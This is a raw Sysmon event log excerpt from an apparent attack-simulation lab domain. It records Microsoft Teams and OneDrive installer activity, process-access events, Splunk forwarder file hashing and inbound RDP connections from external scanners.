14:58:19.795{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TeamsMachineInstaller%%ProgramFiles%%\Teams Installer\Teams.exe --checkInstall --source=PROPLUS 11241100x800000000000000079283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.685{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\SyncEngine.dll2021-04-20 14:58:19.685 254200x800000000000000079282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:19.623{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Teams Installer\Teams.exe2021-02-10 18:35:22.0002021-04-20 14:58:19.076 11241100x800000000000000079281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\FileSyncShell64.dll2021-04-20 14:58:19.388 354300x800000000000000079280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:17.955{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50089-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:17.316{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-13127-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000079278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.248{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\Microsoft.Office.Irm.MsoProtector.dll2021-04-20 14:58:19.248 11241100x800000000000000079277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.123{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\qtquick2plugin.dll2021-04-20 14:58:19.123 11241100x800000000000000079276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.123{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ssleay32.dll2021-04-20 14:58:19.123 11241100x800000000000000079275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.091{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\qquicklayoutsplugin.dll2021-04-20 14:58:19.091 11241100x800000000000000079274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:19.076{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Teams Installer\Teams.exe2021-04-20 14:58:19.076 354300x800000000000000050516Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:17.709{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52534-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050515Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:19.681{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019E497FE06689841B10EFDD34889294,SHA256=4BCFEFA3AD8D45349CB22A1ECEADB2CE36E4B5D1E41E4C6D2FA59D8754584C1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050514Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:19.243{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26CF3321945426616511BA4850F155CF,SHA256=E9014389C00425172FA8E2CEB9B0BF46B9A0ECDA835AFA895BE3EE9AA2CFA30D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.935{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EC0C-607E-370E-00000000BB01}2036C:\Windows\SysWOW64\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.935{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.935{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.935{A7A01FEF-EC0C-607E-360E-00000000BB01}69484788C:\Windows\syswow64\MsiExec.exe{A7A01FEF-EC0C-607E-370E-00000000BB01}2036C:\Windows\SysWOW64\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIAA62.tmp+28f8(wow64)|C:\Windows\Installer\MSIAA62.tmp+247f(wow64)|C:\Windows\Installer\MSIAA62.tmp+3a91(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000079305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.936{A7A01FEF-EC0C-607E-370E-00000000BB01}2036C:\Windows\SysWOW64\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe "C:\Windows\Installer\MSIAA62.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_13806718 26613 SetupConfigCustomAction!Squirrel.SetupConfigCustomAction.SettingsCustomActions.RemoveRegKeyFromPreviousInstallC:\Windows\SysWOW64\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e72SystemMD5=A6ED2B5513A128315EC73A300D215759,SHA256=9980CC59993DCDE34A20411E3FACFEE8E7B159EE0D6FA510BCFAECC8532B4C02,IMPHASH=B79A26282DC6494FFDA9173E830DAB0A{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E5463995B8077107BE0EC817664A5B2F E Global\MSI0000 17141700x800000000000000079304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:20.920{A7A01FEF-EC0C-607E-360E-00000000BB01}6948\SfxCA_13806718C:\Windows\syswow64\MsiExec.exe 23542300x800000000000000079303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.857{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=738267967DFA4421F25C780B08DDA2E0,SHA256=721A7BB95131BEB5829415C4BB0F918CCB93BA1150750A1E8D4374C209E052CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.701{A7A01FEF-EC0C-607E-360E-00000000BB01}69483756C:\Windows\syswow64\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\syswow64\MsiExec.exe+7291|C:\Windows\syswow64\MsiExec.exe+7873|C:\Windows\syswow64\MsiExec.exe+9201|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.576{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.576{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\syswow64\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.545{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.545{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.513{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.513{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.513{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14004552C:\Windows\system32\msiexec.exe{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000079293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.514{A7A01FEF-EC0C-607E-360E-00000000BB01}6948C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E5463995B8077107BE0EC817664A5B2F E Global\MSI0000C:\Windows\SysWOW64\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e72SystemMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 11241100x800000000000000079292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:20.466{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Telemetry.dll2021-04-20 14:58:20.466 354300x800000000000000079291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.495{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-17213-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.377{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57557-false10.0.1.12-8000- 13241300x800000000000000079289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:20.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}\URLUpdateInfo(Empty) 13241300x800000000000000079288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:20.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}\PublisherMicrosoft Corporation 13241300x800000000000000079287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:20.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}\InstallSourceC:\Program Files\Microsoft Office\root\integration\Addons\ 354300x800000000000000050519Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:18.271{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58909-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050518Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:20.696{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8856518345559F1F932DA737523E9FFE,SHA256=CDE1A2E67627CB2ACEE7C30CB404F0B890B048F3A86617C47A07CBF3D19870A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050517Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:20.321{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A27ED41F1B1C3522E8C3488A88D75EDB,SHA256=A00611BED1D9D8D48023B0D61BE0E669D5DB18184656606DBEF6C3EA2A3613C4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:21.888{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\qwindows.dll2021-04-20 14:58:21.888 11241100x800000000000000079318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:21.654{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt2021-04-20 14:58:21.623 354300x800000000000000079317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.139{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-15851-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.007{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64271-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 18141800x800000000000000079315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:21.216{A7A01FEF-EC0C-607E-370E-00000000BB01}2036\SfxCA_13806718C:\Windows\SysWOW64\rundll32.exe 10341000x800000000000000079314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:21.201{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EC0C-607E-370E-00000000BB01}2036C:\Windows\SysWOW64\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:21.201{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC0C-607E-370E-00000000BB01}2036C:\Windows\SysWOW64\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 